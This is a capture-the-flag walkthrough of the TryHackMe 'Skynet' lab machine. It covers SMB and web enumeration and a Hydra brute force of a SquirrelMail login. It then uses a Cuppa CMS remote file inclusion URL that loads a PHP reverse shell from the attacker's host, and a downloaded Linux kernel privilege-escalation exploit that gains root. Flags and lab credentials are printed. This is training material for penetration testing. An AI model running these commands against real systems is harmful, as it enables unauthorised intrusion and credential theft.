# Sky Net Write up

IP: 10.10.61.51

# Question 1: What is Miles password for his emails?

## Recon 

robots.txt

`
Apache/2.4.18 (Ubuntu) Server at 10.10.61.51 Port 80`

Running nmap 

`nmap -sV -sC -oA init.txt 10.10.61.51`


Results

````
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL CAPA PIPELINING SASL AUTH-RESP-CODE RESP-CODES TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more LITERAL+ capabilities ENABLE have post-login listed ID IDLE IMAP4rev1 OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS SASL-IR
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel


````

Looks like it's using Samba

````
Host script results:
|_clock-skew: mean: 1h40m04s, deviation: 2h53m12s, median: 4s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-04-04T17:07:26-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-04T22:07:26
|_  start_date: N/A



````

Let's see what hidden dir it has using gobuster

`gobuster dir -u 10.10.61.51 -w /usr/share/wordlists/dirb/big.txt`

Found

```
2021/04/04 18:15:45 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/ai (Status: 301)
/config (Status: 301)
/css (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)

```
Since it's using samba, smbmap might be of help

`smbmap -H 10.10.61.51`

Foudn something


```
[+] Guest session   	IP: 10.10.61.51:445	Name: 10.10.61.51                                       
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	anonymous                                         	READ ONLY	Skynet Anonymous Share
	milesdyson                                        	NO ACCESS	Miles Dyson Personal Share
	IPC$                                              	NO ACCESS	IPC Service (skynet server (Samba, Ubuntu))

```
Found 4 shares on the samda server
There is a user named Miles Dyson, he doesn't have access though
anonymous have read only access 

connecting to smb client under anonymous

`smbclient //10.10.61.51/anonymous`

`Enter WORKGROUP\root's password: `
I have no idea what the password is so I tried `admin` and hot dang it worked

``
Try "help" to get a list of possible commands.
smb: \> 
``

OK let's see what we have in here

```
smb: \> ls
  .                                   D        0  Thu Nov 26 11:04:00 2020
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019



```
attentiontxt has the following content

```
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

```

let's see what's in the `log` dir

there are three log files, log1, log2 and log3


log1.txt content

```
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator


```
they look like passwords. one of them could be the password for Mile's account

nothing in log2 and log3


ok in Dirbuster we have squirrelmail. login to squirrel mail

<img here> 


there is a log in prompt, trying out the password in the wordlists
using Hydra

I have to get the URL format for form post first, so I'll use BurpSuite for that

Intercepting the POSt method gave me this 

`login_username=admin&secretkey=test&js_autodetect_results=1&just_logged_in=1`
Plug that into Hydra with the username `milesdyson` and the password as the wordlist


````
hydra 10.10.61.51 -l milesdyson -P skynetwordlist.txt http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect" -V 


````

FOUND PASSWORD

```
[80][http-post-form] host: 10.10.61.51   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found



```
## Answer: 

cyborg007haloterminator


# Question 2 What is the hidden directory?


ok loggin in to mail server with the found credentials

one of the first emails said 

```
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
```

lol the next email is binary, translated to

```


01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111


```

```
balls have zero to me to me to me to me to me to me to me to me to

```
ok that was weird lol 

third email said:
```


i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to


```


ok whatever moving on

login to miles's share, I saw a text file in `notes` called `important.txt`. It contains: 

```
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
~

```

CMS looks like a hidden dir
## Answer 
/45kra24zxs28v3yd

# Question 3  What is the vulnerability called when you can include a remote file for malicious purposes?

## Answer: 
Remote File Inclusion 


# Question 4 What is the user flag? 

## Fuzzing

Navigate to the hidden directory we'll find Mile's page

`http://10.10.61.51/45kra24zxs28v3yd/`


trying to fuzzz it with gobuster 

`gobuster dir -u http://10.10.61.51/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt 
`

```
===============================================================
[+] Url:            http://10.10.61.51/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/04 19:17:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)


```
navigate to `http://10.10.61.51/45kra24zxs28v3yd/administrator/`

I found a Cuppa CMS admin page

Let's search to see if there's any vuln

`searchsploit Cuppa`

```
---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote Fi | php/webapps/25971.txt
---------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


```

ok cool, copying to our local machine

```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/sKynet# searchsploit -m php/webapps/25971.txt
  Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
File Type: ASCII text, with very long lines, with CRLF line terminators

Copied to: /root/GitLab/Offensive-Security/TryHackMe/sKynet/25971.txt



```
it's a remote file inclusion exploit, just like the question has asked


## running the exploit

We can get a reverse shell script using php-reverse-shell, which I have

`nano php-reverse-shell`

change the IP into my tun0 and the port to 5555
set up a python simplehttpserver and a netcat listener on 5555
```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/sKynet/shell# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...


```

```
root@kali-virtualbox:~/GitLab/Offensive-Seecuritecuriecurecuecuececuecurity/TryHackMe/sKynet/shell# nc -lvnp 5555
listening on [any] 5555 ...


```

on the Exploit, they providede a link

```
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt
```


Navigate to 

```
http://10.10.61.51/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.31.49:5555/php-reverse-shell.php


```

taking a break, will be back tomorrow

4.5.2021

php-reverseshell config 
Host IP: My tun0
Port 1234


New IP: 10.10.119.47

Setup

`python -m SimpleHTTPServer`

`nc -lvnp 1234`

Navigate to 

`http://10.10.119.47/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.31.49:8000/php-reverse-shell.php`

got a shell on 1234

```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/sKynet/shell# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.31.49] from (UNKNOWN) [10.10.119.47] 46420
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:11:39 up 17 min,  0 users,  load average: 0.00, 0.01, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ whoami
www-data
$ 


```

Go to home and found ther user flag.

```
$ cd home
$ ls
milesdyson
$ cd milesdyson 
$ ls
backups
mail
share
user.txt
$ cat user.txt
7ce5c2109a40f958099283600a9ae807
$ 

```


# Question 5 what is the root flag

Time to escalte that sweet priviledge

Let's check to see if there is any sscripts unning by doing some enumeration

`cat /etc/crontab`


```
www-data@skynet:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 * * * *   root  /home/milesdyson/backups/backup.sh
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


```


a backup.sh script is running in milesdyson. The script is running as root, so this is helpful


Maybe there's an exploit for this kernel

`uname -a`

`Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
`

`searchsploit Linux 4.8.0`

this looks promising

```
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c


```

Copy the exploit to our machine 

```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/sKynet/shell# searchsploit -m 43418.c
  Exploit: Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)
      URL: https://www.exploit-db.com/exploits/43418
     Path: /usr/share/exploitdb/exploits/linux/local/43418.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /root/GitLab/Offensive-Security/TryHackMe/sKynet/shell/43418.c

```

on the target's machine, download the file in miles's temp folder

```
www-data@skynet:/$ cd /home/milesdyson/
www-data@skynet:/home/milesdyson$ cd /tmp
www-data@skynet:/tmp$ ls
systemd-private-f69f361d71fc4972832348a5dc3572b7-dovecot.service-sikmVM
systemd-private-f69f361d71fc4972832348a5dc3572b7-systemd-timesyncd.service-Jh3N1K
www-data@skynet:/tmp$ wget "http://10.6.31.49:8000/43418.c"
--2021-04-05 19:04:07--  http://10.6.31.49:8000/43418.c
Connecting to 10.6.31.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24033 (23K) [text/plain]
Saving to: '43418.c'

43418.c             100%[===================>]  23.47K  --.-KB/s    in 0.1s    

2021-04-05 19:04:07 (201 KB/s) - '43418.c' saved [24033/24033]

www-data@skynet:/tmp$ 


```

Run the exploit

```
ww-data@skynet:/tmp$ gcc 43418.c -o privesc
www-data@skynet:/tmp$ ls
43418.c
privesc
systemd-private-f69f361d71fc4972832348a5dc3572b7-dovecot.service-sikmVM
systemd-private-f69f361d71fc4972832348a5dc3572b7-systemd-timesyncd.service-Jh3N1K
www-data@skynet:/tmp$ chmod +x privesc
www-data@skynet:/tmp$ ./privesc 
[.] starting
[.] checking distro and kernel versions
[.] kernel version '4.8.0-58-generic' detected
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text:   ffffffffa8400000
[.] commit_creds:        ffffffffa84a5d20
[.] prepare_kernel_cred: ffffffffa84a6110
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffffa8417c55
[~] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@skynet:/tmp# 



```

GOT THE DAMN FLAG WOOHOO

```
root@skynet:/tmp# cd /root/
root@skynet:/root# ls
root.txt
root@skynet:/root# cat root.txt 
3f0372db24753accc7179a282cd6a949
root@skynet:/root# 


```
